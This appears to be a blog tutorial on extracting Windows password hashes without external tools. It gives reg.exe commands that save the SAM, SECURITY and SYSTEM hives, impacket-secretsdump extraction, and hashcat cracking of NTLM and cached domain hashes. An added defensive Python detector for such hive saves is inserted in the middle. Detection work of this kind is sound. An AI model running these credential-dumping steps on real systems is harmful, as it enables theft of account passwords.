I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it with built-in Windows tools, for when you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes.

First, the short version:

  1. Export SAM with reg.exe
  2. Convert SAM with impacket-secretsdump to get to the hashes
  3. Use hashcat to crack the hashes

We start by exporting the SAM, SECURITY and SYSTEM hives with reg.exe:

reg.exe save hklm\sam c:\tmp\sam.save
reg.exe save hklm\security c:\tmp\security.save
reg.exe save hklm\system c:\tmp\system.save
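Seen from the defender's side, these three commands are exactly what process-creation telemetry (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled) records on the host. The Python below is an added example, not code from the original post; it assumes the events have already been normalised into dicts with host, user and cmdline keys, and the events in SAMPLE_EVENTS are constructed. It matches reg / reg.exe in any spelling, quoted or with a full path, with either the save or the export subcommand, and rates a host higher the more of the three hives it has written out.

```python
"""Flag reg.exe saves of the SAM, SECURITY and SYSTEM hives in process telemetry.

Added example, not from the original post. Assumes process-creation events
(Sysmon ID 1 / Security 4688 with command-line auditing) are already parsed
into dicts with "host", "user" and "cmdline" keys; SAMPLE_EVENTS is constructed.
"""
import re
from collections import defaultdict

# SAM and SECURITY hold the credential material; SYSTEM only holds the boot key
# that decrypts them and is saved for benign reasons more often, so it scores lower.
HIVE_SCORE = {"SAM": 3, "SECURITY": 3, "SYSTEM": 1}

# reg or reg.exe (bare, quoted, or with a full path), then the save/export
# subcommand, then one of the three hives under HKLM in any spelling or case.
REG_HIVE_RE = re.compile(
    r"""(?ix)
    (?:^|[\\/\s"'])reg(?:\.exe)?["']?\s+
    (?P<sub>save|export)\s+
    ["']?(?:hklm|hkey_local_machine)\\(?P<hive>sam|security|system)\b
    """
)

# Constructed sample telemetry: one host saving all three hives, one saving only
# SYSTEM, one with benign reg/regsvr32 activity, one exporting SAM via cmd.exe.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\helpdesk", "cmdline": r"reg.exe save hklm\sam c:\tmp\sam.save"},
    {"host": "WS01", "user": "CORP\\helpdesk", "cmdline": r"reg.exe save hklm\security c:\tmp\security.save"},
    {"host": "WS01", "user": "CORP\\helpdesk", "cmdline": r'"C:\Windows\System32\reg.exe" save hklm\system c:\tmp\system.save'},
    {"host": "WS02", "user": "NT AUTHORITY\\SYSTEM", "cmdline": r"reg save HKLM\SYSTEM C:\backup\system.hiv"},
    {"host": "WS03", "user": "CORP\\alice", "cmdline": r"reg.exe query hklm\software\microsoft\windows\currentversion\run"},
    {"host": "WS03", "user": "CORP\\alice", "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll"},
    {"host": "WS04", "user": "CORP\\bob", "cmdline": r"cmd.exe /c REG EXPORT HKEY_LOCAL_MACHINE\SAM \\fs01\share\sam.reg"},
]


def classify_cmdline(cmdline):
    """Return (subcommand, HIVE) if the command line writes a credential hive to disk, else None."""
    m = REG_HIVE_RE.search(cmdline)
    if not m:
        return None
    return m.group("sub").lower(), m.group("hive").upper()


def detect_hive_dumps(events):
    """Aggregate matching events per host and rate them.

    Returns {host: {"hives": [...], "users": [...], "score": int, "severity": str}}.
    Hosts with no matching event are absent from the result.
    """
    per_host = defaultdict(lambda: {"hives": set(), "users": set(), "score": 0})
    for ev in events:
        hit = classify_cmdline(ev["cmdline"])
        if hit is None:
            continue
        _, hive = hit
        entry = per_host[ev["host"]]
        if hive not in entry["hives"]:          # score each hive once per host
            entry["score"] += HIVE_SCORE[hive]
        entry["hives"].add(hive)
        entry["users"].add(ev["user"])

    result = {}
    for host, entry in per_host.items():
        score = entry["score"]
        # All three hives (the full secretsdump input set) is critical, SAM or
        # SECURITY on its own is high, SYSTEM on its own is low-confidence.
        severity = "critical" if score >= 7 else "high" if score >= 3 else "low"
        result[host] = {
            "hives": sorted(entry["hives"]),
            "users": sorted(entry["users"]),
            "score": score,
            "severity": severity,
        }
    return result


if __name__ == "__main__":
    for host, alert in detect_hive_dumps(SAMPLE_EVENTS).items():
        print(f"{host}: {alert['severity']:<8} hives={alert['hives']} users={alert['users']}")
```

In the constructed sample, WS01 is rated critical because all three hives were saved, WS04 high for the SAM export alone, WS02 low for SYSTEM only, and WS03 produces nothing. A rule like this belongs on every workstation and server, not only domain controllers, because the cached domain credentials the post goes on to crack live in the SECURITY hive of ordinary member machines.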

It is time to get the hashes out of these files.

Transfer the files to a machine that has impacket installed. We need to extract the hashes from these three files. I use impacket-secretsdump and write the output to roger.hash:

impacket-secretsdump -sam ./sam.save -security ./security.save -system ./system.save LOCAL > roger.hash

Now we have a file roger.hash that contains the local account hashes and the cached domain hashes.

Use hashcat to crack the hashes

For the local accounts we copy their hashes into a file local.hash.

For the cached accounts we do the same into cached.hash. Note that we strip the domain and username prefix so that each line begins with $DCC2$.

Now it is time to crack the hashes. For local accounts we use -m 1000 (NTLM); for cached accounts we use -m 2100 (DCC2).

Cached accounts with a password list:

hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt

Cached accounts with brute force (-a 3), without a mask such as guess.mask:

hashcat -m 2100 -a 3 ./cached.hash

The same for local accounts, except the mode is -m 1000.

I hope this helps someone out there!

Keep hacking!
